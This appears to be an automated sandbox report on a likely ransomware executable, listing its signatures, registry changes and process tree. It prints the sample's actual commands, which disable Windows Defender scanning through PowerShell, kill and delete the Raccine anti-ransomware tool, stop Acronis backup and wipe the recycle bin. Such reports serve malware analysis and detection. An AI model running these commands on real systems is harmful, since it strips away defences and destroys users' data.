Analysis
-
max time kernel
87s -
max time network
131s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
29-10-2021 14:41
Static task
static1
Behavioral task
behavioral1
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
Resource
win10-en-20210920
General
-
Target
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
-
Size
368KB
-
MD5
2a6f56addd8adcbb1a6cc8e1d6090012
-
SHA1
03227744a280d56267cbef448f7e54a924f46173
-
SHA256
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554
-
SHA512
63d951d531ac8c9be311a73ab3c70f3b0afe77a71bbc949ede5564bc98de523bc324c926cb9d4a49dd25171f62333e645e4a56d9e2b4cceab3976672a4eba2c0
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
description flow ioc HTTP URL 25 http://live.sysinternals.com/PsExec64.exe -
Executes dropped EXE 1 IoCs
pid Process 13100 dismhost.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 5 IoCs
pid Process 13100 dismhost.exe 13100 dismhost.exe 13100 dismhost.exe 13100 dismhost.exe 13100 dismhost.exe -
Modifies file permissions 1 TTPs 5 IoCs
pid Process 8632 icacls.exe 8624 icacls.exe 8616 icacls.exe 5860 icacls.exe 5468 icacls.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание внимание внимание!!!" 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Нужна помощь наших специалистов?\r\n\r\nНапишите на почту - [email protected]\r\n\r\nВас обязательно проконсультируют и помогут Вам." 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe -
Drops file in Windows directory 22 IoCs
description ioc Process File created C:\Windows\rescache\_merged\1974107395\1506172464.pri netsh.exe File created C:\Windows\rescache\_merged\2878165772\3312292840.pri netsh.exe File created C:\Windows\rescache\_merged\3623239459\11870838.pri netsh.exe File created C:\Windows\rescache\_merged\3418783148\4223189797.pri netsh.exe File created C:\Windows\rescache\_merged\423379043\2764571712.pri netsh.exe File created C:\Windows\rescache\_merged\3418783148\4223189797.pri netsh.exe File created C:\Windows\rescache\_merged\1601268389\3068621934.pri netsh.exe File created C:\Windows\rescache\_merged\4183903823\1195458082.pri netsh.exe File created C:\Windows\rescache\_merged\1301087654\4010849688.pri netsh.exe File created C:\Windows\rescache\_merged\1476457207\263943467.pri netsh.exe File created C:\Windows\rescache\_merged\1476457207\263943467.pri netsh.exe File created C:\Windows\rescache\_merged\3623239459\11870838.pri netsh.exe File created C:\Windows\rescache\_merged\2483382631\1144272743.pri netsh.exe File created C:\Windows\rescache\_merged\2483382631\1144272743.pri netsh.exe File created C:\Windows\rescache\_merged\1601268389\3068621934.pri netsh.exe File created C:\Windows\rescache\_merged\4185669309\1880392806.pri netsh.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe File created C:\Windows\rescache\_merged\423379043\2764571712.pri netsh.exe File created C:\Windows\rescache\_merged\81479705\2284120958.pri netsh.exe File created C:\Windows\rescache\_merged\4272278488\927794230.pri netsh.exe File created C:\Windows\rescache\_merged\4185669309\1880392806.pri netsh.exe File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 17552 net.exe -
Kills process with taskkill 57 IoCs
pid Process 8128 taskkill.exe 8120 taskkill.exe 8524 taskkill.exe 8196 taskkill.exe 8164 taskkill.exe 8180 taskkill.exe 8560 taskkill.exe 8244 taskkill.exe 8584 taskkill.exe 8532 taskkill.exe 8484 taskkill.exe 5440 taskkill.exe 3504 taskkill.exe 8576 taskkill.exe 8552 taskkill.exe 8540 taskkill.exe 8356 taskkill.exe 8284 taskkill.exe 8380 taskkill.exe 8292 taskkill.exe 8252 taskkill.exe 8052 taskkill.exe 8436 taskkill.exe 8324 taskkill.exe 8316 taskkill.exe 8172 taskkill.exe 8364 taskkill.exe 8260 taskkill.exe 1912 taskkill.exe 8508 taskkill.exe 8072 taskkill.exe 8500 taskkill.exe 8308 taskkill.exe 1580 taskkill.exe 8112 taskkill.exe 8080 taskkill.exe 8220 taskkill.exe 4504 taskkill.exe 8140 taskkill.exe 8452 taskkill.exe 8348 taskkill.exe 8332 taskkill.exe 8396 taskkill.exe 8228 taskkill.exe 8104 taskkill.exe 8088 taskkill.exe 8060 taskkill.exe 8468 taskkill.exe 8412 taskkill.exe 8212 taskkill.exe 8096 taskkill.exe 8568 taskkill.exe 8276 taskkill.exe 8420 taskkill.exe 1036 taskkill.exe 8036 taskkill.exe 8148 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2248 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeIncreaseQuotaPrivilege 3216 net.exe Token: SeSecurityPrivilege 3216 net.exe Token: SeTakeOwnershipPrivilege 3216 net.exe Token: SeLoadDriverPrivilege 3216 net.exe Token: SeSystemProfilePrivilege 3216 net.exe Token: SeSystemtimePrivilege 3216 net.exe Token: SeProfSingleProcessPrivilege 3216 net.exe Token: SeIncBasePriorityPrivilege 3216 net.exe Token: SeCreatePagefilePrivilege 3216 net.exe Token: SeBackupPrivilege 3216 net.exe Token: SeRestorePrivilege 3216 net.exe Token: SeShutdownPrivilege 3216 net.exe Token: SeDebugPrivilege 3216 net.exe Token: SeSystemEnvironmentPrivilege 3216 net.exe Token: SeRemoteShutdownPrivilege 3216 net.exe Token: SeUndockPrivilege 3216 net.exe Token: SeManageVolumePrivilege 3216 net.exe Token: 33 3216 net.exe Token: 34 3216 net.exe Token: 35 3216 net.exe Token: 36 3216 net.exe Token: SeDebugPrivilege 828 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeDebugPrivilege 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 3372 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 8220 taskkill.exe Token: SeDebugPrivilege 8228 taskkill.exe Token: SeDebugPrivilege 8252 taskkill.exe Token: SeDebugPrivilege 8396 taskkill.exe Token: SeDebugPrivilege 8244 taskkill.exe Token: SeDebugPrivilege 8356 taskkill.exe Token: SeDebugPrivilege 8436 taskkill.exe Token: SeDebugPrivilege 8332 taskkill.exe Token: SeDebugPrivilege 8412 taskkill.exe Token: SeDebugPrivilege 8452 taskkill.exe Token: SeDebugPrivilege 8420 taskkill.exe Token: SeDebugPrivilege 8276 taskkill.exe Token: SeDebugPrivilege 8308 taskkill.exe Token: SeDebugPrivilege 8292 taskkill.exe Token: SeDebugPrivilege 8484 taskkill.exe Token: SeDebugPrivilege 8500 taskkill.exe Token: SeDebugPrivilege 8380 taskkill.exe Token: SeDebugPrivilege 8468 taskkill.exe Token: SeDebugPrivilege 8284 taskkill.exe Token: SeDebugPrivilege 8364 taskkill.exe Token: SeDebugPrivilege 8316 taskkill.exe Token: SeDebugPrivilege 8324 taskkill.exe Token: SeDebugPrivilege 8348 taskkill.exe Token: SeDebugPrivilege 8532 taskkill.exe Token: SeDebugPrivilege 8260 taskkill.exe Token: SeDebugPrivilege 8212 taskkill.exe Token: SeDebugPrivilege 8508 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 312 wrote to memory of 3216 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 70 PID 312 wrote to memory of 3216 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 70 PID 312 wrote to memory of 828 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 73 PID 312 wrote to memory of 828 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 73 PID 312 wrote to memory of 1020 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 75 PID 312 wrote to memory of 1020 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 75 PID 312 wrote to memory of 1152 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 77 PID 312 wrote to memory of 1152 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 77 PID 312 wrote to memory of 1552 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 79 PID 312 wrote to memory of 1552 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 79 PID 312 wrote to memory of 1952 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 81 PID 312 wrote to memory of 1952 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 81 PID 312 wrote to memory of 2776 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 85 PID 312 wrote to memory of 2776 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 85 PID 312 wrote to memory of 3888 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 84 PID 312 wrote to memory of 3888 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 84 PID 312 wrote to memory of 948 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 953 PID 312 wrote to memory of 948 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 953 PID 312 wrote to memory of 5032 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 90 PID 312 wrote to memory of 5032 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 90 PID 312 wrote to memory of 3400 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 88 PID 312 wrote to memory of 3400 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 88 PID 312 wrote to memory of 3372 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 89 PID 312 wrote to memory of 3372 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 89 PID 312 wrote to memory of 1608 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 92 PID 312 wrote to memory of 1608 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 92 PID 312 wrote to memory of 1912 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 95 PID 312 wrote to memory of 1912 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 95 PID 312 wrote to memory of 956 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 96 PID 312 wrote to memory of 956 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 96 PID 312 wrote to memory of 2248 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 97 PID 312 wrote to memory of 2248 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 97 PID 312 wrote to memory of 2148 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 951 PID 312 wrote to memory of 2148 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 951 PID 312 wrote to memory of 3548 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 100 PID 312 wrote to memory of 3548 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 100 PID 312 wrote to memory of 3664 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 917 PID 312 wrote to memory of 3664 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 917 PID 312 wrote to memory of 2996 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 948 PID 312 wrote to memory of 2996 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 948 PID 312 wrote to memory of 3796 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 946 PID 312 wrote to memory of 3796 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 946 PID 312 wrote to memory of 3080 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 944 PID 312 wrote to memory of 3080 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 944 PID 312 wrote to memory of 4496 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 943 PID 312 wrote to memory of 4496 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 943 PID 312 wrote to memory of 4616 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 104 PID 312 wrote to memory of 4616 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 104 PID 312 wrote to memory of 4540 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 105 PID 312 wrote to memory of 4540 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 105 PID 312 wrote to memory of 1836 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 106 PID 312 wrote to memory of 1836 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 106 PID 312 wrote to memory of 1040 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 108 PID 312 wrote to memory of 1040 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 108 PID 312 wrote to memory of 2488 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 111 PID 312 wrote to memory of 2488 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 111 PID 312 wrote to memory of 2304 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 113 PID 312 wrote to memory of 2304 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 113 PID 312 wrote to memory of 516 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 114 PID 312 wrote to memory of 516 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 114 PID 312 wrote to memory of 2980 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 938 PID 312 wrote to memory of 2980 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 938 PID 312 wrote to memory of 1988 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 115 PID 312 wrote to memory of 1988 312 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe 115 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание внимание внимание!!!" 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Нужна помощь наших специалистов?\r\n\r\nНапишите на почту - [email protected]\r\n\r\nВас обязательно проконсультируют и помогут Вам." 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"C:\Users\Admin\AppData\Local\Temp\1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.exe"1⤵
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3216 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:14536
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:956
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:2248
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:3548
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:3664
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:4616
-
-
